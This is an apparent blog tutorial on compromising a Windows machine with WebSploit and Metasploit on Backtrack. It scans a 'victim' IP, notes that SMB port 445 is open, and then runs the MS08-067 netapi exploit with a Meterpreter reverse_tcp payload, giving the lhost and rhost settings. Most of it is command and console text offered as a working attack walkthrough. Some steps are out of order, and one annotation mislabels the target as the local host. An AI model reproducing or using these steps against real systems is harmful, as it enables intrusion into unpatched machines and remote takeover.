First Install Websploit Toolkit in Backtrack
Now type use exploit/windows/smb/ms08_067_netapi
For More about Meterpreter command visit Meterpreter Basic Commands
Open Your Backtrack terminal and Type cd /pentest/web/websploit
Now open WebSploit Toolkit (SET) ./websploit
Now choose option 3 “Automatic Exploiter”
Now choose option 1 “Service Autopwn”
wsf: Autopwn > Enter Target IP Address: 192.168.1.56 (IP Address of Victim)
The results above are showing that the port 445 is open so we will try to use the netapi exploit.
The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.
Now Type "Search netapi" command in the console, this command will search for all the exploit modules with the pattern "netapi"
Msf exploit (ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms08_067_netapi)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (ms08_067_netapi)>set rhost 192.168.1.56 (IP of Local Host)
Msf exploit (ms08_067_netapi)>exploit
0 komentar:
Speak up your mind
Tell us what you're thinking... !